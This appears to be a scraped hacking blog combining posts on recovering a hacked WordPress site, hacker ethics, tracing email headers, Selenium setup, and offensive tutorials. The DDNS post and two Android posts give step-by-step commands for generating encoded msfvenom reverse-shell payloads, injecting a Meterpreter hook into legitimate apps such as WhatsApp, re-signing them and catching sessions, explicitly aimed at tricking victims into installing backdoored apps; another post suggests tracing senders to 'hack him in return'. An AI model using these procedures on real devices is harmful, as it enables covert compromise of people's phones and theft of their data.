How I fixed My Hacked WordPress Blog: Restoring the Content

I made my blog Techkernel quite some time back, but I never took it seriously. I made a very few number of posts, and never bothered to maintain the blog properly. I just moderated the comments, never bothering to reply them (I know, I’m a terrible person). I also did not updated the plugins, neither WordPress itself. But I realised my mistake when my blog got hacked and the most popular post of it got replaced by some crappy advertisement.


Here I will document what I did to get it fixed to as it was before.

Restoring the Original Post

Firstly, I needed to restore the post. WordPress keeps a revisions list of posts, so I looked there. But not so surprisingly, the original revision was removed. The oldest revision I could get was, sadly, the advertisement, not my original post. So this approach was not going to work.


Second step was to look for any backups I made. I did not set up any solid backup system, so the only backup I could’ve made was as an export file (for your reference, WordPress lets you export all your contents as an .xml file). I searched for any file whose name contains techkernel in my PC, and voila, there was one. I was lucky. Had I not made such a backup (which I did for the keks, not anticipating a situation such as this), I would have to restore it from a backup image of my server at Digital Ocean, which would be much more painful to do.

So I opened up the export file techkernel.wordpress.2016-04-22.xml, looked for my post in there, and copy pasted it back to my blog.


Updating the WordPress Site

I use WP-CLI in my WordPress installation, and it’s fantastic. You should also start using it right away if you are not already not doing that.

Updating WordPress, its plugins and themes

The first thing I did was update WordPress, all installed plugins and themes to the latest version. I did this using WP-CLI.

Updating WordPress core.

skulltech@debian-512mb-blr1-01:/var/www/$ wp core update
 Updating to version 4.8 (en_US)...
 Downloading update from
 Unpacking the update...
 Cleaning up files...
 No files found that need cleaned up.
 Success: WordPress updated successfully.

Updating all WordPress plugins.

 skulltech@debian-512mb-blr1-01:/var/www/$ wp plugin update --all
 Enabling Maintenance mode...
 Downloading update from
 Unpacking the update...
 Installing the latest version...
 Removing the old version of the plugin...
 Plugin updated successfully.
 Downloading update from
 Unpacking the update...
 Installing the latest version...
 Removing the old version of the plugin...
 Plugin updated successfully.
 Downloading update from
 Unpacking the update...
 Installing the latest version...
 Removing the old version of the plugin...
 Plugin updated successfully.
 Disabling Maintenance mode...
 | name | old_version | new_version | status |
 | akismet | 3.2 | 3.3.2 | Updated |
 | jetpack | 4.5 | 5.0 | Updated |
 | wordpress-seo | 4.1 | 4.9 | Updated |
 Success: Updated 3 of 3 plugins.

Updating all WordPress themes.

 skulltech@debian-512mb-blr1-01:/var/www/$ wp theme update --all
 Enabling Maintenance mode...
 Downloading update from
 Unpacking the update...
 Installing the latest version...
 Removing the old version of the theme...
 Theme updated successfully.
 Downloading update from
 Unpacking the update...
 Installing the latest version...
 Removing the old version of the theme...
 Theme updated successfully.
 Disabling Maintenance mode...
 | name | old_version | new_version | status |
 | twentyfifteen | 1.7 | 1.8 | Updated |
 | twentyseventeen | 1.1 | 1.3 | Updated |
 Success: Updated 2 of 2 themes.

Resetting Passwords

After that what I did was resetting all the passwords: password of the WordPress installation, password of the user accounts of the DigitalOcean Droplet and so on.


The Next Steps

The next steps were obviously, removing any backdoor the hackers may have left and securing the site. I will write a post on that shortly, so stay tuned!

Ethical Hacking and The Hacker Culture

Nowadays most of us have heard the term Ethical Hacker due to ‘hacktivist’ groups like Anonymous gaining popularity in the media. But what exactly is Ethical Hacking? We have a general idea that it means hacking without any malicious intent, or more simply the kind of hacking the ‘good guys’ do. But if we delve deeper, it means more than that, it represents a philosophy and morality popular among the hacker and hacktivist communities.


Formally Ethical Hacking may be defined as the practice of systematically attempting to break into or penetrate for the purpose of locating weaknesses and vulnerabilities of the computer system by duplicating the actions of malicious black-hat hackers. Actually, what I just said defines Penetration Testing, to be precise ‘Ethical Hacking’ is a term coined by IBM meant to imply a broader category than just penetration testing. Ethical hackers do this ‘penetration testing’ on the request of or by being employed by the owner of the computer system so that he can fix these weaknesses and make the system more secure.


Ethical hackers generally follow a set of moral values and philosophy. They promote sharing of knowledge, they believe that all information should be free. They also believe bureaucracies such as corporates are flawed systems, they promote decentralization so that may lead to freedom of information exchange. They say that hackers shouldn’t be judged by their age, race, or qualifications, they should only by judged by their hacking skill. A common value of community and collaboration is also present among the hackers.

I should emphasize that being an ethical hacker doesn’t necessarily mean having these qualities and following these moral values and philosophies. Hacker ethics are separate from just being a hacker. But these ethics are very popular among the general hacking community and so it may be considered as a trait of the community, maybe not of an individual hacker.

Before concluding I would like to share a small essay written by a hacker by the name (rather pseudo name) of ‘The Mentor’ shortly after being arrested. It’s called ‘The Hacker Manifesto’, and is considered one of the cornerstone of the hacker culture. You can find it here –

Email | Structure and How to Trace it

We all have received fake spam mail telling us that we’ve won million dollars at some point in our life. Maybe one day you receive a threatening email or a simple phishing mail, and you want to find out who did it so that you can hack him in return. To do that you need to know the IP address of the mail server sending the email. In this article I’m gonna show you how to do that, after introducing you to the basics of the structure of an Internet Message or simply, Email.

Email is one of oldest mode of communication through a computer network (usually the Internet) which is still popular today. The Email which we are familiar with was standardized and came into popular usage in the early 1970s, and it has been a core foundation of the Internet since then. Nowadays we all use a fancy web interface or mobile app to send and view received emails, so we don’t have to worry about how is it working. But that isn’t enough for a hacker, is it? If we don’t know the detailed intricacies of its mechanism, how can we exploit it or do something advanced with it? So, keep reading!

The Internet Message Format

The current Email format is defined in RFC 5322. Multimedia Email attachments’ format is defined in RFC 2045 through RFC 2049, and this format is called Multimedia Internet Mail Extensions or simply MIME. You can read those RFC articles to get a fully detailed formal documentation of the structure and format of email, but it’s not necessary as I will discuss it in short here. Nevertheless, if you are interested to learn more, you can check them out after reading this post of mine.

At the most basic level, an email is a series of ASCII characters. It consists of line of characters, lines ending with ASCII ‘CRLF’ (carriage return and line feed). The entire email can be divided into two parts, the Header section and the Body. Let’s see an example email to get an idea of what we are talking about.

Received: by with SMTP id e31csp1128773qtc;
Tue, 18 Oct 2016 09:50:19 -0700 (PDT)
X-Received: by with SMTP id n82mr2118112ioi.125.1476809419401;
Tue, 18 Oct 2016 09:50:19 -0700 (PDT)
Received: from ( [])
by with ESMTPS id g126si21395826ioa.252.2016.
(version=TLS1_2 cipher=ECDHE-RSA-AES128-GCM-SHA256 bits=128/128);
Tue, 18 Oct 2016 09:50:19 -0700 (PDT)
Received-SPF: pass ( domain of designates as permitted sender) client-ip=;
spf=pass ( domain of designates as permitted sender)
DKIM-Signature: v=1; a=rsa-sha1; c=relaxed;; h=mime-version:from:to:reply-to:subject:content-type:content-transfer-encoding; s=smtpapi; bh=yheKlMFCWTtON78IXgxVWyAUb78=; b=I8q38u7TFdqinW6Y02 AM+ifHWAvTihYfBs5GSZl8JDnuc1BlMffeS8KUkWyRJjLY+B0ch4uPXBvCHdCZ75 VGkMp0jmmQRyVzQ4hfvAeTYVJ0fDzB89cHKyTzLTpd/ak9D0OAcc+6TJFqCgURMH CSrAzDL/ejxBTOEgepL8Y3Feg=
DKIM-Signature: v=1; a=rsa-sha1; c=relaxed;; h=mime-version:from:to:reply-to:subject:content-type:content-transfer-encoding:x-feedback-id; s=smtpapi; bh=yheKlMFCWTtON78IXgxVWyAUb78=; b=YK6zoBmBYxE2GRUFIh Qze6EJGuxLw1UtO+NGfdmUgSmtNVLUt8p/N+CS9nPNONFESaVo2Ebk0iV8OBXqs0 EhPaOVOIiAcnSI/fwzd8A/dN+y3gqNquU3ysc9Gyk3kDcFSI8nj9yC4uhAs4fpMv AC/2kWdHjFjHBiTRYcL07C46M=
Received: by with SMTP id filter0958p1mdw1.2775.580652C7AF
2016-10-18 16:50:15.915852162 +0000 UTC
Received: from ECPRID2AWEB004 ( []) by (SG) with ESMTP id aIawJW2DTFi0CgbichcKJg for ; Tue, 18 Oct 2016 16:50:15.917 +0000 (UTC)
MIME-Version: 1.0
From: Autodesk 
Date: 18 Oct 2016 16:50:15 +0000
Subject: Verify your Autodesk account
Content-Type: text/html; charset=utf-8
Content-Transfer-Encoding: base64
X-SG-EID: iimKsBOu00eJI3OJPONMulw6aZ/yjiemm1SqdEDLcTZBP1eHyN3Qr32i1Vdhd5J7BwflVrWhRCLr0j woo/OKUHaIA1bGmnv8Qd2DfN0OSocqGDQ8DK7afms0hcjbrNUG/S3Bsv7fJWCR15UEaoJ/qfJtpdgG gZSAdl3d07GxUEWB0KHMNBmsfHLUEhfyzWPfn5IBYcQ334wRxcWBQ/eu31XQd8fIXETIiBgrd19ic6 SiLuZKRyxs7mVzCv46+9G/
X-Feedback-ID: 1621835:SZNY+iwS6efjfOV9JjNuzvzTddPNBc3FolKu4zujGFA=:SZNY+iwS6efjfOV9JjNuzvzTddPNBc3FolKu4zujGFA=:SG


The part before the first empty line is the header of this email, and after that the rest is body. Here you can see that the body part looks like some incomprehensible garbage, that’s because it is a MIME message, and the garbage part is actually HTML data encoded by Base64 encoding. You can decode it using any of the Base64 decoder found online and get the HTML data. Anyway, we are going to focus on the header part, because all other critical information resides in there, the body part contains just the message.

We can see the header part consists of header fields, each header field consisting of a field name and field value separated by a colon ‘:’.  for example a header field of this email is


Where ‘Delivered-To’ is the field name and ‘’ is the field value. Just to be clear, I replaced my original email ID with ‘’ here.

The header section can contain any number of information in this format, there is no restriction. So there can be different header fields in various emails. But there are certain fields that are mandatory, and those contain the information we need to trace the mail. You can read about various email header fields here on Wikipedia.

Tracing an Email

Now that we know the basics of the Internet Message Format, it’s time we dive into the fun stuff, tracing the email. For that, we need to concentrate on the Trace fields, so to speak. They contain the information needed to trace it, obviously. The trace fields are:

  • Received
  • Return-Path
  • Authentication-Results
  • Received-SPF
  • Auto-Submitted
  • VBR-Info

Among these, the Received field is the most important and most reliable. When an SMTP server receives a message it inserts this header at the top of the message. And as most emails go through several SMTP servers in the journey from the sender to receiver, it contains several Received fields, each one inserted by different SMTP servers. In the example email the Received fields are:

Received: by with SMTP id e31csp1128773qtc;
        Tue, 18 Oct 2016 09:50:19 -0700 (PDT)
X-Received: by with SMTP id n82mr2118112ioi.125.1476809419401;
        Tue, 18 Oct 2016 09:50:19 -0700 (PDT)
Received: from ( [])
        by with ESMTPS id g126si21395826ioa.252.2016.
        (version=TLS1_2 cipher=ECDHE-RSA-AES128-GCM-SHA256 bits=128/128);
        Tue, 18 Oct 2016 09:50:19 -0700 (PDT)
Received: by with SMTP id filter0958p1mdw1.2775.580652C7AF
        2016-10-18 16:50:15.915852162 +0000 UTC
Received: from ECPRID2AWEB004 ( []) by (SG) with ESMTP id aIawJW2DTFi0CgbichcKJg for ; Tue, 18 Oct 2016 16:50:15.917 +0000 (UTC)

As SMTP servers insert the Received field at the top of the email when they receive it, if we read them from top to bottom we can trace the path through the email has travelled. The field value of the Received header field generally contains the host name or IP address of itself and the host name or IP of the server from which it received the mail.

Another thing to note here, I’ve also listed the X-Received header field. Any field starting with X is a non-standard header and it cannot be trusted. It’s used by mail servers for their own benefit, generally a servers won’t trust X headers inserted by any other server. Anyway, I’ve still included this because it may give us some additional information, keeping in mind that it is not very reliable. So from the Received (and X-Received) fields of the example mail, we can trace the route of the mail, and it would look like this

  • []

The email went through these servers in this order. So the mail server that actually sent the email is the first one, and if you were after that one for reasons, you can focus on that.

Automating the Tracing of an Email

Although it’s good or maybe essential for a hacker to know how to manually trace an email, you don’t have to do it every time. There are many tools in the Internet that automate this process. You just have to paste the email header in those tools and they will trace the route of it. Just search email header analyser in Google and you’ll get a lot of tools like this. There’s one made by Google itself, you can get it here. Happy hacking!


Python – Starting Up Selenium Webdriver, with Custom User-Agent and Profile

I’ve been playing around with Selenium Webdriver in Python, and one of the most annoying thing I had to do again and again is looking up how to start a specific Webdriver with a custom user-agent or with a custom profile. So I decided to make this module which will take care of all the little inner workings involved while starting up a Webdriver.

The code is here –

You’ll just have to use the start_webdriver function, and it will do all the magic and return the required Webdriver.

Example usage:

import wdstart
driver = wdstart.start_webdriver(driver_name='Chrome', user_agent='Mozilla/5.0 (Linux; Android 4.0.4; Galaxy Nexus Build/IMM76B) AppleWebKit/535.19(KHTML, like Gecko) Chrome/18.0.1025.133 Mobile Safari/535.19', profile_path='C:\Users\SkullTech\AppData\Local\Google\Chrome\User Data')

Although in most cases you won’t have to worry about what’s happening under the hood (they are not at all important and can be found out with a simple Google search), but still if you want you can read the code thoroughly and use part of it in your code.

Please leave a comment if this helped you or you’ve faced any problem. Thanks.

Use DDNS to Deal with Your Dynamic Public IP

Many of us have an internet connection with dynamic public IP. That poses some problems if you want to use that connection to host a website, or maybe for hackers like us, to hack using reverse connection payloads. I’m going to discuss in this post how you can overcome that using Dynamic DNS or DDNS. But I’m getting ahead of myself, so let me start by explaining what is public IP and what are some problems you can encounter if you have a dynamic one.

Understanding Dynamic Public IP Address

Public IP is the IP that’s visible to machines outside your local network. For example if two or more machines are connected through a router (maybe through WiFi) to the internet, then the machines are in a local network, as well as both of them are connected to the Internet. Each of them has a locally unique private IP address, not globally. For connecting to the Internet they use the router’s public IP.

IP addresses can be static or dynamic. Most of the ISPs provide dynamic public IP, that means it changes from time to time, contrary to the static one, which remains fixed. You can check what’s your public IP by googling ‘What is my IP’, Google will tell you.

Having a dynamic IP address is a hindrance to hacking using reverse connection payloads. Reverse connection payloads, such as android/meterpreter/reverse_tcp, store the host IP address, i.e. the IP address of the attacker machine. When it gets executed, it connects back to the host machine by the reference of that host IP. But as dynamic IP keeps changing from time to time, you won’t be able to use a payload for a long time because  after some time the IP stored inside it won’t point to your machine anymore. That’s a problem. A major one. This is where DDNS comes in.

Dynamic DNS aka DDNS to the Rescue

We all know what DNS or Domain Naming System is, it’s the system which binds an IP to a domain name. When you try to connect to a domain name, for example opening on a  browser, the request first goes to a DNS server, which resolves the domain name into an IP, and then the browser gets the Google homepage from that IP. Similarly you can get a domain name for your machine and put that domain name in the place of HOST IP address in your payload. But the problem of your IP being dynamic still remains.

Here DDNS comes to the rescue. DDNS servers update the DNS record of your machine continuously, so that even for dynamic IP machines the domain name resolves to the correct IP, always.

Setting up DDNS using No-IP

There are many DDNS providers, I’m going to use No-IP which is one of them.

Step 1: Creating a No-IP account

Head to and create a free account there.

Step 2: Adding a Hostname in No-IP

When you get to the dashboard, go to Dynamic DNS -> Hostnames and add a hostname of your choice from there. You can also choose a domain name from a list there. The address you will get is hostname.domainname. Such as I chose the default domain name and the hostname I entered is skulltech. So the address I got is ‘’. Refer to the screenshots below for reference.


Step 3: Install the Dynamic DNS Update Client

Now you’ll need to install a program on your computer and set it up. So that it connects to No-IP server frequently and updates the DNS record. Download the update client from . It’s a tar.gz archive, extract it using the following command

tar -xzvf noip-duc-linux.tar.gz

screenshot-from-2016-12-18-14-24-36After that change working directory to the newly extracted folder and run the following command to install the No-IP client.

make install

After that the program will ask for your No-IP username and password.

Step 4: Configure the Client and Run It

Run the following command to launch the configuration wizard of the No-IP client. It will ask you for your credentials, as well as which hostnames you want to update. Select the hostname (or hostnames) that you want to associate with this computer in that step.

noip2 -C

When you are done with the configuration, just run noip2 in the terminal to start the client, it will run in the background and keep updating your DNS record.



Using DDNS hostname in Payloads

You can create a basic reverse shell payload for windows and get a shell on a remote computer on running it in that computer. Refer to this tutorial by Offensive Security for that, I won’t be going into details how to do that. Assuming that you already know how to create these payloads using msfvenom (if you don’t check out this tutorial), I’ll show you how you can use your DDNS hostname there.

Generally we run a command like this to generate the payload. Here LHOST is the address of the our local machine, in the following example it’s 

msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST= LPORT=3333 -b "\x00" -e x86/shikata_ga_nai -f exe -o /tmp/1.exe

Now that we have a DDNS hostname, pass that as LHOST to msfvenom instead of your IP. So now the command will be

msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LPORT=3333 -b "\x00" -e x86/shikata_ga_nai -f exe -o /tmp/1.exe

Feel free to leave a comment if you face any problem. Happy Hacking! 🙂

Embed a Metasploit Payload in an original .apk File | Part 2 – Do it manually

Metasploit’s flagship product, the Meterpreter, is very powerful and an all-purpose payload. Once installed on the victim machine, we can do whatever we want to their system by sending out commands to it. For example, we could grab sensitive data out of the compromised system.

The Meterpreter payload also comes as an installable .apk file for Android systems. Great! Now we can use Metasploit to compromise Android phones also. But if you have tried out these payloads you would know that they do not look convincing. No one in their right mind is going to install and run such an app, which apparently does nothing when it is opened. So how are we going to make the victim run the payload app in their phone?

One of the solutions is that you can embed the payload inside another legitimate app. The app will look and behave exactly as the original one, so the victim won’t even know that his system is compromised. That’s what we are going to do in this tutorial.

NOTE – This is a follow-up post of my previous post, in which I showed you how to do this using a very simple yet effective Ruby script. If you haven’t read it, check it out. If you are not willing to go down the hard path, you can use that method to do it just fine. But if you want to know the inner workings and have a greater knowledge, continue reading this post. And also, In the following Android Hacking tutorials, I may refer to this tutorial, so If you can take it, I suggest you to keep on reading.


This tutorial is based on the Kali Linux Operating System. I’m sure it can be done in other OS, especially Linux Distros, but that will involve some more complications so I’m not going to cover those. If you are serious about Hacking [or Penetration Testing, if you prefer], you should use Kali as it was built specifically for Pen-Testing.

We will also need some libraries and tools in the following steps, so I think it’s better if you install them right now.

To install the required libraries, enter this command at the console:

apt-get install lib32stdc++6 lib32ncurses5 lib32z1

And to get the latest version of ApkTool, head over to this site and follow the installation instructions.

Also download the apk which you want to be backdoor-ed from any source you like. Just do a google search “app_name apk download” and Google will come up with a lot of results. Save that apk in the root folder.


Since this tutorial is a little bit long, I’m giving a brief overview of what we are going to do here.

  1. Generate the Meterpreter payload
  2. Decompile the payload and the original apk
  3. Copy the payload files to the original apk
  4. Inject the hook into the appropriate activity of the original apk
  5. Inject the permissions in the AndroidManifest.xml file
  6. Re-compile the original apk
  7. Sign the apk using Jarsigner

That’s about it. I will also show you how can you get a working Meterpreter session using that backdoored apk, if you don’t know that already. So let’s get started.


First of all, we have to make the Meterpreter payload. We are going to use MSFVenom for this. The command is-

msfvenom -p android/meterpreter/[Payload_Type] LHOST=[IP_Address] LPORT=[Incoming_Port] -o meterpreter.apk
      • Replace [Payload_Type] by any of the following payloads available. The function of all these payloads are same, essentially they are all Meterpreter payloads, the difference is only in the method they use to connect to your Kali system. The available [Payload_Type]s are –
        1. reverse_tcp
        2. reverse_http
        3. reverse_https

        You can use any one you like, I’m going to use reverse_https as an example.

      • Replace [IP_Address] by the IP address to which the payload is going to connect back to, i.e the IP address of the attacker’s system. If you are going to perform this attack over a local network (eg. if the victim and attacker are connected to the same WiFi hotspot), your Local IP will suffice. To know what your local IP is, run the command –
        Screenshot from 2015-12-18 13:56:49

        If you are going to perform this attack over the Internet, you have to use your public IP address, and configure your router properly (set up port forwarding) so that your system is accessible from the Internet. To know your public IP, just google “My IP” and Google will help you out.

      • Replace [Incoming_Port] with the port no. which you want to be used by the payload to connect to your system. This can be any valid port except the reserved ones like port 80 (HTTP). I’m going to use 4895 as an example.

So run the command using replacing the keywords with appropriate values and MSFVenom will generate a payload “meterpreter.apk” in the root directory. Note that we specified the output file name using the “-o meterpreter.apk” argument in the command, so if you like, you can name it anything else also.

Screenshot from 2015-12-18 14:23:14


Now we have to decompile the APKs, for this we are going to use APKTool. It decompiles the code to a fairly human-readable format and saves it in .smali files, and also successfully extracts the .xml files. Assuming you have already installed the latest apktool and also have the original apk file in the root directory, run the following commands –

apktool d -f -o payload /root/meterpreter.apk

apktool d -f -o original /root/[Original_APK_Name]

It will decompile the payload to “/root/payload” and the original apk to “/root/original” directory.

Screenshot from 2015-12-19 01:30:26



Now we have to copy the payload files to the original app’s folder. Just go to “/root/payload/smali/com/metasploit/stage” and copy all the .smali files whose file name contains the word ‘payload’. Now paste them in “/root/original/smali/com/metasploit/stage”. Note that this folder does not exists, so you have to create it.


In the previous step, we just copied the payload codes inside the original apk, so that when the original apk is recompiled, it will contain the payload. But that doesn’t necessarily mean that the payload will run. To ensure that the payload runs, we have to inject a hook in the original apk’s .smali code. If you are wondering what is this hook thingy I’m talking about, well essentially it’s a code which intercepts some specific function call and reacts to it. In this case, we are going to place the hook so that when the app is launched, it will also launch the payload with it.

For this, firstly we have to find out which activity [to put it simply, activities are sections of code, it’s similar to frames in windows programming] is run when the app is launched. We can get this info from the AndroidManifest.xml file.

So open up the AndroidManifest.xml file located inside the “/root/original” folder using any text editor. If you know HTML, then this file will look familiar to you. Both of them are essentially Markup Languages, and both use the familiar tags and attributes structure [e.g. <tag attribute=”value”> Content </tag>]. Anyway, look for an <activity> tag which contains both the lines –

<action android:name="android.intent.action.MAIN"/>
<category android:name="android.intent.category.LAUNCHER"/>

On a side note, you can use CTRL+F to search within the document in any GUI text editor. When you locate that activity, note its “android:name” attribute’s value. In my case, as you can see from the screenshot below, it is “com.piriform.ccleaner.ui.activity.MainActivity”.

Screenshot from 2015-12-19 13:21:32

Those two lines we searched for signifies that this is the activity which is going to start when we launch the app from the launcher icon, and also this is a MAIN activity [similar to the ‘main’ function in traditional programming].

Now that we have the name of the activity we want to inject the hook into, let’s get to it! First of all, open the .smali code of that activity using gedit. Just open a terminal and type –

gedit /root/original/smali/[Activity_Path]

Replace the [Activity_Path] with the activity’s “android:name”, but instead of the dots, type slash. Actually the smali codes are stored in folders named in the format the “android:name” is in, so we can easily get the location of the .smali code in the way we did. Check the screenshot below and you will get an idea of what I’m trying to say.

Screenshot from 2015-12-19 19:06:17

Now search for the following line in the smali code [using CTRL+F] –


When you locate it, paste the following code in the line next to it –

invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V

What we are doing here is, inserting a code which starts the payload alongside the existing code which is executed when the activity starts. Now, save the edited smali file.


From –

Additional finer-grained security features are provided through a “permission” mechanism that enforces restrictions on the specific operations that a particular process can perform.

If we do not mention all the additional permissions that our payload is going to need, it cannot function properly. While installing an app, these permissions are shown to the user. But most of the users don’t care to read all those boring texts, so we do not have to worry about that much.

These permissions are also listed in the previously encountered AndroidManifest file. So let’s open the AndroidManifest.xml of both the original app and the payload from the respective folders. The permissions are mentioned inside <uses-permission> tag as an attribute ‘android:name’. Copy the additional permission lines from the Payload’s AndroidManifest to the original app’s one. But be careful that there should not be any duplicate.

Here’s my original app’s AndroidManifest before editing –Screenshot from 2015-12-19 19:37:12

After adding the additional ones from the Payload’s AndroidManifest, my /root/original/AndroidManifest.xml looks like this – Screenshot from 2015-12-19 19:42:48


Now th hard parts are all done! We just have to recompile the backdoored app into an installable apk. Run the following command –

apktool b /root/original

Screenshot from 2015-12-19 20:14:31

You will now have the compiled apk inside the “/root/original/dist” directory. But, we’re still not done yet.


This is also a very important step, as in most of the cases, an unsigned apk cannot be installed. From –

Android requires that all apps be digitally signed with a certificate before they can be installed. Android uses this certificate to identify the author of an app, and the certificate does not need to be signed by a certificate authority. Android apps often use self-signed certificates. The app developer holds the certificate's private key.

In this case we are going to sign the apk using the default android debug key. Just run the following command –

jarsigner -verbose -keystore ~/.android/debug.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA [apk_path] androiddebugkey

Be sure to replace the [apk_path] in the above command with the path to your backdoored apk file.

Screenshot from 2015-12-19 20:28:31


Now if you can get the victim to install and run this very legit-looking app in his phone, you can get a working meterpreter session on his phone!

Screenshot from 2015-12-19 20:44:01

Embed a Metasploit Payload in an Original .apk File | Part 1 – The Easy Way

Hi Fellas! I’m sure most of you, or at least those who have set a foot in the kingdom of hacking, have heard of Metasploit. Don’t be disappointed if you haven’t, because you’re in the right track.

From Wikipedia,

The Metasploit Project is a computer security project that provides information about security vulnerabilities and aids in penetration testing and IDS signature development.
Its best-known sub-project is the open source Metasploit Framework, a tool for developing and executing exploit code against a remote target machine. Other important sub-projects include the Opcode Database, shellcode archive and related research.

In a more informal language, it’s a tool which we can use to perform various kinds of hacks against a machine. The flagship payload which comes with the Metasploit Framework is the ‘Meterpreter’, which also has an Android version that comes as an .apk file. In case you are wondering what a payload is,  it’s a program we can install on a victim’s system to compromise it. Normally we have to install the Meterpreter payload in the victims phone by any means [Usually involving Social Engineering], and when the victim runs the application, we would get a direct connection to that phone remotely and we can use it to wreak havoc on it.

But since the payload app doesn’t look very legit, takes up only a few kBs, and doesn’t show anything when clicked on, the victim will probably uninstall it right away, or worse, wouldn’t install it at all. So we have to solve that problem.

Here’s where this tutorial comes in. I’m gonna show you how to take any .apk file, be it WhatsApp or Amazon or SnapChat, and embed the Meterpreter payload in that apk. To the victim it will look and behave exactly as the original app, so he will use it regularly without any doubt, letting you do anything you want to his phone.


Just to be clear,  In this tutorial the operating system used is Kali Linux, which is a de facto standard OS for Penetration Testing (Read, hacking). You should also install the latest version of ‘ApkTool’ and some libraries for the scripts to work properly.

To install the required libraries, enter this command at the console:

apt-get install lib32stdc++6 lib32ncurses5 lib32z1

And to get the latest version of ApkTool, head over to this site and follow the installation instructions.


First of all grab the original apk from any of the numerous websites available. Just do a google search “app_name apk download” and Google will come up with a lot of results. Save that apk in any folder, in this tutorial I will use the Root folder and a WhatApp.apk as example.


Download the Ruby script from this link and save it in the same folder as that of the original apk.


Open a terminal, and type the following command:

ruby apk-embed-payload.rb WhatsApp.apk -p android/meterpreter/reverse_tcp LHOST= LPORT=4895

In this example I’ve used as the Local IP address, i.e. your IP address and 4895 as the port on your Computer through which the Meterpreter payload will connect back to you. Make sure to change it to the appropriate values, especially the IP, the LPORT can be set to any reasonable port no.

NOTE – If you are going to conduct this attack over the internet, be sure to put your public IP, not your local IP, in the LHOST option. You also may need to forward the port you’re using for this attack to work properly.

Once you run the command, if you are lucky, the script will do everything by itself and complete the whole process. But more than often it cannot determine to which Activity of the app it should bind the payload to, so it asks you to select it. In that case, leave the terminal open with the script at the prompt, and browse to /root/original.

Then open the AndroidManifest.xml file using any text editor you like and look for an <activity> tag which contains both the texts ‘.MAIN’ and ‘.LAUNCHER’. When you find that tag, look for the ‘android:name’ attribute of that tag and from there, note the name of that Activity.

At the prompt of the Ruby script, enter the number corresponding to the Activity name you had noted previously and press Enter.

This is the hardest step of all, so I’m posting some screenshots to make your life easier.

Screenshot from 2015-12-12 01-44-01Screenshot from 2015-12-12 01-43-27


If you did everything correctly, you should now get a apk file in your root directory with the name ‘backdoored_WhatsApp.apk’. It will install and run just like the original app.

As for the listener, you should use multi/handler and set the corresponding options accordingly. Just run the following commands.

use multi/handler
set PAYLOAD android/meterpreter/reverse_tcp
set LPORT 4895

Now wait for the victim to run the app, when he does it, you will get a Meterpreter prompt in the terminal!

Screenshot from 2015-12-18 14:32:55


You must have noticed I haven’t explained anything, rather asked you to blindly follow. As none of us wants to be a script-kiddie, we will learn how to do this manually in the next article. To be honest, I didn’t know how to successfully implement this until I found this script. After I saw that this script does what it promises, I learned the process by reverse-engineering it. Let us set that story apart for another article.

If you face any problem, don’t forget to mention it in the comments. I’ll try to help you in any way I can.


I found the script from the comments section of a thread in NullByte, so thanks to the guy who shared it, I’m sorry I don’t remember which thread it was or who the guy was. And credit of making this script goes to timwr and Jack64.